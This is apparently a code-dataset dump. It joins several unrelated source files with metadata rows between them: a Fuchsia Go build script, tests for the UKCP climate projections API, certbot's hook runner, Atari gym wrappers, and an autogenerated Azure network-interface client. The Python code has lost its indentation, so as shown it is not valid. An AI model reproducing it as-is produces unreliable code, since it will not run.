'--include-dir',
help='-isystem path to add',
action='append',
default=[])
parser.add_argument(
'--lib-dir', help='-L path to add', action='append', default=[])
parser.add_argument('--vet', help='Run go vet', action='store_true')
parser.add_argument(
'--tag', help='Add a go build tag', default=[], action='append')
parser.add_argument(
'--cgo', help='Whether to enable CGo', action='store_true')
args = parser.parse_args()
try:
os.makedirs(args.go_cache)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(args.go_cache):
pass
else:
raise
goarch = {
'x64': 'amd64',
'arm64': 'arm64',
}[args.current_cpu]
goos = {
'fuchsia': 'fuchsia',
'linux': 'linux',
'mac': 'darwin',
'win': 'windows',
}[args.current_os]
build_id_dir = os.path.join(args.root_out_dir, '.build-id')
dist = args.stripped_output_path or args.output_path
# Project path is a package-specific GOPATH, also known as a "project" in Go parlance.
project_path = os.path.join(
args.root_out_dir, 'gen', 'gopaths', args.binname)
# Clean up any old project path to avoid leaking old dependencies.
gopath_src = os.path.join(project_path, 'src')
if os.path.exists(gopath_src):
shutil.rmtree(gopath_src)
os.makedirs(gopath_src)
link_to_source_list = []
if args.go_dep_files:
assert args.root_build_dir, (
'--root-build-dir is required with --go-dep-files')
root_build_dir = os.path.abspath(args.root_build_dir)
link_to_source = {}
# Create a GOPATH for the packages dependency tree.
for dst, src in sorted(get_sources(args.go_dep_files).items()):
# Determine if the src path should
# - be mapped as-is which, if src is a directory, includes all subdirectories
# - have its contents enumerated and mapped directly
map_directly = False
if dst.endswith('/...'):
# When a directory and all its subdirectories must be made available, map
# the directory directly.
map_directly = True
# - src can have a '/...' suffix like with 'github.com/google/go-cmp/...'.
# - This means all subpackages are being symlinked to the GOPATH.
# - dst can have the suffix when defining a package.
# - src can only have the suffix if dst has it too.
assert dst.endswith('/...') >= src.endswith('/...'), (dst, src)
dst = dst[:-4]
if src.endswith('/...'):
src = src[:-4]
elif os.path.isfile(src):
# When sources are explicitly listed in the BUILD.gn file, each `src` will
# be a path to a file that must be mapped directly.
map_directly = True
# Paths with /.../ in the middle designate go packages that include
# subpackages, but also explicitly list all their source files.
# The construction of these paths is done in the
# godepfile tool, so we remove these sentinel values here.
dst = dst.replace('/.../', '/')
dstdir = os.path.join(gopath_src, dst)
if map_directly:
# Make a symlink to the src directory or file.
parent = os.path.dirname(dstdir)
if not os.path.exists(parent):
os.makedirs(parent)
os.symlink(src, dstdir)
link_to_source[os.path.join(root_build_dir, dstdir)] = src
else:
# Map individual files since the dependency is only on the
# package itself, not Go subpackages. The only exception is
# 'testdata'.
os.makedirs(dstdir)
for filename in os.listdir(src):
src_file = os.path.join(src, filename)
if filename == 'testdata' or os.path.isfile(src_file):
os.symlink(src_file, os.path.join(dstdir, filename))
link_to_source[os.path.join(
root_build_dir, dstdir, filename)] = src
# Create a sorted list of (link, src) pairs, with longer paths before
# shorter ones. This ensures that 'foobar' will appear before 'foo'.
link_to_source_list = sorted(
link_to_source.items(), key=lambda x: x[0], reverse=True)
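# Illustrative example (the destination path is hypothetical, not taken from a real
# BUILD.gn target): a dep-file entry such as
#   'github.com/google/go-cmp/...' -> 'third_party/golibs/github.com/google/go-cmp'
# is mapped with a single directory symlink under gopath_src, while a package whose
# sources are listed explicitly gets one symlink per file, so only that package (plus
# any 'testdata' directory) becomes visible to the go tool.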
cflags = []
if args.sysroot:
cflags.extend(['--sysroot', args.sysroot])
if args.target:
cflags.extend(['-target', args.target])
ldflags = cflags[:]
if args.current_os == 'linux':
ldflags.extend(
[
'-stdlib=libc++',
# TODO(fxbug.dev/64336): the following flags are not recognized by CGo.
# '-rtlib=compiler-rt',
# '-unwindlib=',
])
for dir in args.include_dir:
cflags.extend(['-isystem', dir])
ldflags.extend(['-L' + dir for dir in args.lib_dir])
cflags_joined = ' '.join(cflags)
ldflags_joined = ' '.join(ldflags)
gopath = os.path.abspath(project_path)
build_goroot = os.path.abspath(args.go_root)
env = {
# /usr/bin:/bin are required for basic things like bash(1) and env(1). Note
# that on Mac, ld is also found from /usr/bin.
'PATH': os.path.join(build_goroot, 'bin') + ':/usr/bin:/bin',
# Disable modules to ensure Go doesn't try to download dependencies.
'GO111MODULE': 'off',
'GOARCH': goarch,
'GOOS': goos,
'GOPATH': gopath,
# Some users have GOROOT set in their parent environment, which can break
# things, so it is always set explicitly here.
'GOROOT': build_goroot,
'GOCACHE': args.go_cache,
'CC': args.cc,
'CXX': args.cxx,
'CGO_CFLAGS': cflags_joined,
'CGO_CPPFLAGS': cflags_joined,
'CGO_CXXFLAGS': cflags_joined,
'CGO_LDFLAGS': ldflags_joined,
}
# Infra sets $TMPDIR which is cleaned between builds.
if os.getenv('TMPDIR'):
env['TMPDIR'] = os.getenv('TMPDIR')
if args.cgo:
env['CGO_ENABLED'] = '1'
if args.target:
env['CC_FOR_TARGET'] = env['CC']
env['CXX_FOR_TARGET'] = env['CXX']
go_tool = os.path.join(build_goroot, 'bin', 'go')
if args.vet:
retcode = subprocess.call([go_tool, 'vet', args.package], env=env)
if retcode != 0:
return retcode
cmd = [go_tool]
if args.is_test:
cmd += ['test', '-c']
else:
cmd += ['build', '-trimpath']
if args.verbose:
cmd += ['-x']
if args.tag:
# Separate tags by spaces. This behavior is actually deprecated in the
# go command line, but Fuchsia currently has an older version of go
# that hasn't switched to commas.
cmd += ['-tags', ' '.join(args.tag)]
if args.buildmode:
cmd += ['-buildmode', args.buildmode]
if args.gcflag:
cmd += ['-gcflags', ' '.join(args.gcflag)]
if args.ldflag:
cmd += ['-ldflags=' + ' '.join(args.ldflag)]
cmd += [
'-pkgdir',
os.path.join(project_path, 'pkg'),
'-o',
args.output_path,
args.package,
]
retcode = subprocess.call(cmd, env=env)
if retcode == 0 and args.stripped_output_path:
if args.current_os == 'mac':
retcode = subprocess.call(
[
'xcrun', 'strip', '-x', args.output_path, '-o',
args.stripped_output_path
],
env=env)
else:
retcode = subprocess.call(
[
args.objcopy, '--strip-sections', args.output_path,
args.stripped_output_path
],
env=env)
# TODO(fxbug.dev/27215): Also invoke the buildidtool in the case of linux
# once buildidtool knows how to deal in Go's native build ID format.
supports_build_id = args.current_os == 'fuchsia'
if retcode == 0 and args.dump_syms and supports_build_id:
if args.current_os == 'fuchsia':
with open(dist + '.sym', 'w') as f:
retcode = subprocess.call(
[args.dump_syms, '-r', '-o', 'Fuchsia', args.output_path],
stdout=f)
if retcode == 0 and args.buildidtool and supports_build_id:
if not args.build_id_dir:
raise ValueError('Using --buildidtool requires --build-id-dir')
retcode = subprocess.call(
[
args.buildidtool,
'-build-id-dir',
args.build_id_dir,
'-stamp',
dist + '.build-id.stamp',
'-entry',
'.debug=' + args.output_path,
'-entry',
'=' + dist,
])
if retcode == 0:
if args.depfile is not None:
godepfile_args = [args.godepfile, '-o', dist]
for f, t in link_to_source_list:
godepfile_args += ['-prefixmap', '%s=%s' % (f, t)]
if args.is_test:
godepfile_args += ['-test']
godepfile_args += [args.package]
with open(args.depfile, 'wb') as into:
subprocess.check_call(godepfile_args, env=env, stdout=into)
return retcode
if __name__ == '__main__':
sys.exit(main())
|
[] |
[] |
[
"TMPDIR"
] |
[]
|
["TMPDIR"]
|
python
| 1 | 0 | |
test/test_ukcp18_web_api.py
|
import os
import requests
import time
import xml.etree.ElementTree as ET
from ukcp_api_client.client import UKCPApiClient
API_KEY = os.environ.get('API_KEY', None)
if not API_KEY:
raise Exception('Please define environment variable: "API_KEY"')
BASE_URL = 'https://ukclimateprojections-ui.metoffice.gov.uk'
URL_TEMPLATE = ('{base_url}/wps?'
'Request=Execute&Identifier={proc_id}&Format=text/xml&Inform=true&Store=false&'
'Status=false&DataInputs={data_inputs}&ApiKey={api_key}')
REQUEST_INPUTS = {
'LS1_Plume_01':
('Area=point|245333.38|778933.24;Baseline=b8100;'
'Collection=land-prob;ColourMode=c;DataFormat=csv;FontSize=m;'
'ImageFormat=png;ImageSize=1200;LegendPosition=7;PlotType=PDF_PLOT;'
'Scenario=sres-a1b;TemporalAverage={month};TimeSlice=2050-2069;'
'TimeSliceDuration=20y;Variable=tasAnom;'),
'LS1_Maps_01':
('TemporalAverage=jja;Baseline=b8100;Scenario=rcp45;'
'Area=bbox|-84667.14|-114260.00|676489.68|1230247.30;'
'SpatialSelectionType=bbox;TimeSliceDuration=20y;DataFormat=csv;'
'FontSize=m;Collection=land-prob;TimeSlice=2060-2079;'
'ShowBoundaries=country;Variable=prAnom;ImageSize=1200;ImageFormat=png')
}
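# Illustrative example (values abbreviated, wrapped here for readability): for
# proc_id='LS1_Plume_01', URL_TEMPLATE.format(...) expands to something like
#   https://ukclimateprojections-ui.metoffice.gov.uk/wps?Request=Execute
#     &Identifier=LS1_Plume_01&Format=text/xml&Inform=true&Store=false&Status=false
#     &DataInputs=Area=point|245333.38|778933.24;...;TemporalAverage=jan;...&ApiKey=<API_KEY>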
def _call_api(proc_id, expect_error_code=-999, **kwargs):
dct = {}
dct['proc_id'] = proc_id
dct['api_key'] = API_KEY
dct['base_url'] = BASE_URL
dct['data_inputs'] = REQUEST_INPUTS[proc_id].format(**kwargs)
url = URL_TEMPLATE.format(**dct)
print('Calling: {}'.format(url))
try:
response = requests.get(url)
except Exception as err:
if getattr(err, 'code', None) == expect_error_code:
return err
raise Exception('Failed with unexpected error: {}\nURL: {}'.format(err, url))
xml_doc = response.text
return url, xml_doc
def _call_api_expect_429(proc_id, **kwargs):
err = _call_api(proc_id, expect_error_code=429, **kwargs)
print('Got required error code: 429')
def _call_api_get_status_url(proc_id, **kwargs):
url, xml_doc = _call_api(proc_id, **kwargs)
root = ET.fromstring(xml_doc)
status_url = root.get("statusLocation", None)
if not status_url:
raise Exception('Could not get valid response for request: {}'.format(url))
return status_url
def test_12_months_via_api():
months = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec']
for month in months:
# Sleep for long enough for all to run
_call_api('LS1_Plume_01', month=month)
time.sleep(30)
def _check_status(xml_doc):
if xml_doc.find('<ProcessSucceeded>The End</ProcessSucceeded>') > -1:
return True
else:
return False
def _poll_status_url(status_url):
# Polls until completion - unless exited
while 1:
time.sleep(5)
response = requests.get(status_url)
xml_doc = response.text
if _check_status(xml_doc):
return xml_doc
def _get_zip_file_url(xml_doc):
for line in xml_doc.split('\n'):
if line.find('.zip</FileURL>') > -1:
zip_url = line.split('>')[1].split('<')[0]
return zip_url
raise Exception('Could not find Zip File location')
def _download_output(url):
# Append API Key
url += '?ApiKey={}'.format(API_KEY)
response = requests.get(url)
output = response.text
def test_single_call():
status_url = _call_api_get_status_url('LS1_Maps_01')
assert(status_url.find(BASE_URL) == 0)
# Wait for completion
xml_doc = _poll_status_url(status_url)
# Check output for zip file URL
zip_url = _get_zip_file_url(xml_doc)
# Test download
_download_output(zip_url)
def test_5_calls():
# Expect to get turned away
for i in range(2):
time.sleep(0.2)
_call_api_get_status_url('LS1_Maps_01')
for i in range(3):
time.sleep(0.2)
_call_api_expect_429('LS1_Maps_01')
def test_fail_when_running():
cli = UKCPApiClient(outputs_dir='my-outputs', api_key=API_KEY)
request_url = 'https://ukclimateprojections-ui.metoffice.gov.uk/wps?' \
'Request=Execute&Identifier=LS3_Subset_01&Format=text/xml&Inform=true&Store=false&' \
'Status=false&DataInputs=TemporalAverage=jan;Area=bbox|474459.24|246518.35|' \
'474459.24|246518.35;Collection=land-rcm;ClimateChangeType=absolute;' \
'EnsembleMemberSet=land-rcm;DataFormat=csv;TimeSlice=2075|2076;Variable=psl'
try:
cli.submit(request_url)
except Exception as err:
last_line = str(err).split('\n')[-1].strip()
assert(last_line == 'The process failed with error message: "UnboundLocalError= ' \
'local variable \'time_index\' referenced before assignment"')
#The process failed with error message: "IndexError= too many indices for array"')
def test_fail_on_submit():
cli = UKCPApiClient(outputs_dir='my-outputs', api_key=API_KEY)
request_url = 'https://ukclimateprojections-ui.metoffice.gov.uk/wps?' \
'Request=Execute&Identifier=Rubbish&Format=text/xml&Inform=true&Store=false'
try:
cli.submit(request_url)
except Exception as err:
assert(str(err) == 'Request failed: InvalidParameterValue: Identifier not found. (None)')
|
[] |
[] |
[
"API_KEY"
] |
[]
|
["API_KEY"]
|
python
| 1 | 0 | |
certbot/hooks.py
|
"""Facilities for implementing hooks that call shell commands."""
from __future__ import print_function
import logging
import os
from subprocess import Popen, PIPE
from certbot import errors
from certbot import util
from certbot.plugins import util as plug_util
logger = logging.getLogger(__name__)
def validate_hooks(config):
"""Check hook commands are executable."""
validate_hook(config.pre_hook, "pre")
validate_hook(config.post_hook, "post")
validate_hook(config.deploy_hook, "deploy")
validate_hook(config.renew_hook, "renew")
def _prog(shell_cmd):
"""Extract the program run by a shell command.
:param str shell_cmd: command to be executed
:returns: basename of command or None if the command isn't found
:rtype: str or None
"""
if not util.exe_exists(shell_cmd):
plug_util.path_surgery(shell_cmd)
if not util.exe_exists(shell_cmd):
return None
return os.path.basename(shell_cmd)
def validate_hook(shell_cmd, hook_name):
"""Check that a command provided as a hook is plausibly executable.
:raises .errors.HookCommandNotFound: if the command is not found
"""
if shell_cmd:
cmd = shell_cmd.split(None, 1)[0]
if not _prog(cmd):
path = os.environ["PATH"]
if os.path.exists(cmd):
msg = "{1}-hook command {0} exists, but is not executable.".format(cmd, hook_name)
else:
msg = "Unable to find {2}-hook command {0} in the PATH.\n(PATH is {1})".format(
cmd, path, hook_name)
raise errors.HookCommandNotFound(msg)
def pre_hook(config):
"Run pre-hook if it's defined and hasn't been run."
cmd = config.pre_hook
if cmd and cmd not in pre_hook.already:
logger.info("Running pre-hook command: %s", cmd)
_run_hook(cmd)
pre_hook.already.add(cmd)
elif cmd:
logger.info("Pre-hook command already run, skipping: %s", cmd)
pre_hook.already = set() # type: ignore
def post_hook(config):
"""Run post hook if defined.
If the verb is renew, we might have more certs to renew, so we wait until
run_saved_post_hooks() is called.
"""
cmd = config.post_hook
# In the "renew" case, we save these up to run at the end
if config.verb == "renew":
if cmd and cmd not in post_hook.eventually:
post_hook.eventually.append(cmd)
# certonly / run
elif cmd:
logger.info("Running post-hook command: %s", cmd)
_run_hook(cmd)
post_hook.eventually = [] # type: ignore
def run_saved_post_hooks():
"""Run any post hooks that were saved up in the course of the 'renew' verb"""
for cmd in post_hook.eventually:
logger.info("Running post-hook command: %s", cmd)
_run_hook(cmd)
def deploy_hook(config, domains, lineage_path):
"""Run post-issuance hook if defined.
:param configuration.NamespaceConfig config: Certbot settings
:param domains: domains in the obtained certificate
:type domains: `list` of `str`
:param str lineage_path: live directory path for the new cert
"""
if config.deploy_hook:
renew_hook(config, domains, lineage_path)
def renew_hook(config, domains, lineage_path):
"""Run post-renewal hook if defined."""
if config.renew_hook:
if not config.dry_run:
os.environ["RENEWED_DOMAINS"] = " ".join(domains)
os.environ["RENEWED_LINEAGE"] = lineage_path
logger.info("Running deploy-hook command: %s", config.renew_hook)
_run_hook(config.renew_hook)
else:
logger.warning(
"Dry run: skipping deploy hook command: %s", config.renew_hook)
def _run_hook(shell_cmd):
"""Run a hook command.
:returns: stderr if there was any"""
err, _ = execute(shell_cmd)
return err
def execute(shell_cmd):
"""Run a command.
:returns: `tuple` (`str` stderr, `str` stdout)"""
# universal_newlines causes Popen.communicate()
# to return str objects instead of bytes in Python 3
cmd = Popen(shell_cmd, shell=True, stdout=PIPE,
stderr=PIPE, universal_newlines=True)
out, err = cmd.communicate()
base_cmd = os.path.basename(shell_cmd.split(None, 1)[0])
if out:
logger.info('Output from %s:\n%s', base_cmd, out)
if cmd.returncode != 0:
logger.error('Hook command "%s" returned error code %d',
shell_cmd, cmd.returncode)
if err:
logger.error('Error output from %s:\n%s', base_cmd, err)
return (err, out)
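# Illustrative sketch (not part of certbot's documented API): the helpers above are
# composed by certbot's renewal code roughly as
#
#   pre_hook(config)             # runs config.pre_hook at most once per invocation
#   ...obtain or renew certificates...
#   renew_hook(config, domains, lineage_path)   # exports RENEWED_* vars, runs the hook
#   post_hook(config)            # deferred to run_saved_post_hooks() for the 'renew' verb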
|
[] |
[] |
[
"PATH",
"RENEWED_DOMAINS",
"RENEWED_LINEAGE"
] |
[]
|
["PATH", "RENEWED_DOMAINS", "RENEWED_LINEAGE"]
|
python
| 3 | 0 | |
Utils/Atari_PPO_training/atari_wrappers.py
|
import numpy as np
import os
os.environ.setdefault('PATH', '')
from collections import deque
import gym
from gym import spaces
import cv2
cv2.ocl.setUseOpenCL(False)
class TimeLimit(gym.Wrapper):
def __init__(self, env, max_episode_steps=None):
super(TimeLimit, self).__init__(env)
self._max_episode_steps = max_episode_steps
self._elapsed_steps = 0
def step(self, ac):
observation, reward, done, info = self.env.step(ac)
self._elapsed_steps += 1
if self._elapsed_steps >= self._max_episode_steps:
done = True
info['TimeLimit.truncated'] = True
return observation, reward, done, info
def reset(self, **kwargs):
self._elapsed_steps = 0
return self.env.reset(**kwargs)
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset(**kwargs)
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(self.noop_action)
if done:
obs = self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
# for Qbert sometimes we stay in lives == 0 condition for a few frames
# so it's important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self, **kwargs):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset(**kwargs)
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = np.zeros((2,)+env.observation_space.shape, dtype=np.uint8)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = None
for i in range(self._skip):
obs, reward, done, info = self.env.step(action)
if i == self._skip - 2: self._obs_buffer[0] = obs
if i == self._skip - 1: self._obs_buffer[1] = obs
total_reward += reward
if done:
break
# Note that the observation on the done=True frame
# doesn't matter
max_frame = self._obs_buffer.max(axis=0)
return max_frame, total_reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
def __init__(self, env):
gym.RewardWrapper.__init__(self, env)
def reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env, width=84, height=84, grayscale=True, dict_space_key=None):
"""
Warp frames to 84x84 as done in the Nature paper and later work.
If the environment uses dictionary observations, `dict_space_key` can be specified which indicates which
observation should be warped.
"""
super().__init__(env)
self._width = width
self._height = height
self._grayscale = grayscale
self._key = dict_space_key
if self._grayscale:
num_colors = 1
else:
num_colors = 3
new_space = gym.spaces.Box(
low=0,
high=255,
shape=(self._height, self._width, num_colors),
dtype=np.uint8,
)
if self._key is None:
original_space = self.observation_space
self.observation_space = new_space
else:
original_space = self.observation_space.spaces[self._key]
self.observation_space.spaces[self._key] = new_space
assert original_space.dtype == np.uint8 and len(original_space.shape) == 3
def observation(self, obs):
if self._key is None:
frame = obs
else:
frame = obs[self._key]
if self._grayscale:
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
frame = cv2.resize(
frame, (self._width, self._height), interpolation=cv2.INTER_AREA
)
if self._grayscale:
frame = np.expand_dims(frame, -1)
if self._key is None:
obs = frame
else:
obs = obs.copy()
obs[self._key] = frame
return obs
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Stack k last frames.
Returns lazy array, which is much more memory efficient.
See Also
--------
baselines.common.atari_wrappers.LazyFrames
"""
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
self.observation_space = spaces.Box(low=0, high=255, shape=(shp[:-1] + (shp[-1] * k,)), dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return self._get_ob()
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._get_ob(), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
class ScaledFloatFrame(gym.ObservationWrapper):
def __init__(self, env):
gym.ObservationWrapper.__init__(self, env)
self.observation_space = gym.spaces.Box(low=0, high=1, shape=env.observation_space.shape, dtype=np.float32)
def observation(self, observation):
# careful! This undoes the memory optimization, use
# with smaller replay buffers only.
return np.array(observation).astype(np.float32) / 255.0
class LazyFrames(object):
def __init__(self, frames):
"""This object ensures that common frames between the observations are only stored once.
It exists purely to optimize memory usage which can be huge for DQN's 1M frames replay
buffers.
This object should only be converted to numpy array before being passed to the model.
You'd not believe how complex the previous solution was."""
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=-1)
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
def count(self):
frames = self._force()
return frames.shape[frames.ndim - 1]
def frame(self, i):
return self._force()[..., i]
def make_atari(env_id, max_episode_steps=None):
env = gym.make(env_id)
assert 'NoFrameskip' in env.spec.id
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
if max_episode_steps is not None:
env = TimeLimit(env, max_episode_steps=max_episode_steps)
return env
def wrap_deepmind(env, episode_life=True, clip_rewards=True, frame_stack=False, scale=False):
"""Configure environment for DeepMind-style Atari.
"""
if episode_life:
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if scale:
env = ScaledFloatFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
if frame_stack:
env = FrameStack(env, 4)
return env
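# Usage sketch (illustrative; assumes the Atari ROMs for gym are installed):
#
#   env = make_atari('PongNoFrameskip-v4')
#   env = wrap_deepmind(env, frame_stack=True, scale=False)
#   obs = env.reset()   # LazyFrames; np.array(obs) has shape (84, 84, 4)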
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
vendor/github.com/Azure/azure-sdk-for-go/arm/network/interfaces.go
|
package network
// Copyright (c) Microsoft and contributors. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
//
// See the License for the specific language governing permissions and
// limitations under the License.
//
// Code generated by Microsoft (R) AutoRest Code Generator 0.17.0.0
// Changes may cause incorrect behavior and will be lost if the code is
// regenerated.
import (
"github.com/Azure/go-autorest/autorest"
"github.com/Azure/go-autorest/autorest/azure"
"github.com/Azure/go-autorest/autorest/validation"
"net/http"
)
// InterfacesClient is the client for the Microsoft Azure Network management API,
// which provides a RESTful set of web services that interact with the Microsoft
// Azure Networks service to manage your network resources. The API has entities
// that capture the relationship between an end user and the Microsoft Azure
// Networks service.
type InterfacesClient struct {
ManagementClient
}
// NewInterfacesClient creates an instance of the InterfacesClient client.
func NewInterfacesClient(subscriptionID string) InterfacesClient {
return NewInterfacesClientWithBaseURI(DefaultBaseURI, subscriptionID)
}
// NewInterfacesClientWithBaseURI creates an instance of the InterfacesClient
// client.
func NewInterfacesClientWithBaseURI(baseURI string, subscriptionID string) InterfacesClient {
return InterfacesClient{NewWithBaseURI(baseURI, subscriptionID)}
}
// CreateOrUpdate the Put NetworkInterface operation creates/updates a
// networkInterface. This method may poll for completion. Polling can be
// canceled by passing the cancel channel argument. The channel will be used
// to cancel polling and any outstanding HTTP requests.
//
// resourceGroupName is the name of the resource group. networkInterfaceName
// is the name of the network interface. parameters is parameters supplied to
// the create/update NetworkInterface operation
func (client InterfacesClient) CreateOrUpdate(resourceGroupName string, networkInterfaceName string, parameters Interface, cancel <-chan struct{}) (result autorest.Response, err error) {
if err := validation.Validate([]validation.Validation{
{TargetValue: parameters,
Constraints: []validation.Constraint{{Target: "parameters.Properties", Name: validation.Null, Rule: false,
Chain: []validation.Constraint{{Target: "parameters.Properties.NetworkSecurityGroup", Name: validation.Null, Rule: false,
Chain: []validation.Constraint{{Target: "parameters.Properties.NetworkSecurityGroup.Properties", Name: validation.Null, Rule: false,
Chain: []validation.Constraint{{Target: "parameters.Properties.NetworkSecurityGroup.Properties.NetworkInterfaces", Name: validation.ReadOnly, Rule: true, Chain: nil},
{Target: "parameters.Properties.NetworkSecurityGroup.Properties.Subnets", Name: validation.ReadOnly, Rule: true, Chain: nil},
}},
}},
}}}}}); err != nil {
return result, validation.NewErrorWithValidationError(err, "network.InterfacesClient", "CreateOrUpdate")
}
req, err := client.CreateOrUpdatePreparer(resourceGroupName, networkInterfaceName, parameters, cancel)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "CreateOrUpdate", nil, "Failure preparing request")
}
resp, err := client.CreateOrUpdateSender(req)
if err != nil {
result.Response = resp
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "CreateOrUpdate", resp, "Failure sending request")
}
result, err = client.CreateOrUpdateResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "CreateOrUpdate", resp, "Failure responding to request")
}
return
}
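// Illustrative call sketch (resource names and the parameters value are placeholders):
//
//	cancel := make(chan struct{})
//	resp, err := client.CreateOrUpdate("myResourceGroup", "myNIC", nicParameters, cancel)
//
// Closing the cancel channel aborts polling and any outstanding HTTP requests, as
// described in the method comment above.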
// CreateOrUpdatePreparer prepares the CreateOrUpdate request.
func (client InterfacesClient) CreateOrUpdatePreparer(resourceGroupName string, networkInterfaceName string, parameters Interface, cancel <-chan struct{}) (*http.Request, error) {
pathParameters := map[string]interface{}{
"networkInterfaceName": autorest.Encode("path", networkInterfaceName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsJSON(),
autorest.AsPut(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}", pathParameters),
autorest.WithJSON(parameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{Cancel: cancel})
}
// CreateOrUpdateSender sends the CreateOrUpdate request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) CreateOrUpdateSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client,
req,
azure.DoPollForAsynchronous(client.PollingDelay))
}
// CreateOrUpdateResponder handles the response to the CreateOrUpdate request. The method always
// closes the http.Response Body.
func (client InterfacesClient) CreateOrUpdateResponder(resp *http.Response) (result autorest.Response, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusCreated, http.StatusOK),
autorest.ByClosing())
result.Response = resp
return
}
// Delete the delete networkInterface operation deletes the specified
// networkInterface. This method may poll for completion. Polling can be
// canceled by passing the cancel channel argument. The channel will be used
// to cancel polling and any outstanding HTTP requests.
//
// resourceGroupName is the name of the resource group. networkInterfaceName
// is the name of the network interface.
func (client InterfacesClient) Delete(resourceGroupName string, networkInterfaceName string, cancel <-chan struct{}) (result autorest.Response, err error) {
req, err := client.DeletePreparer(resourceGroupName, networkInterfaceName, cancel)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "Delete", nil, "Failure preparing request")
}
resp, err := client.DeleteSender(req)
if err != nil {
result.Response = resp
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "Delete", resp, "Failure sending request")
}
result, err = client.DeleteResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "Delete", resp, "Failure responding to request")
}
return
}
// DeletePreparer prepares the Delete request.
func (client InterfacesClient) DeletePreparer(resourceGroupName string, networkInterfaceName string, cancel <-chan struct{}) (*http.Request, error) {
pathParameters := map[string]interface{}{
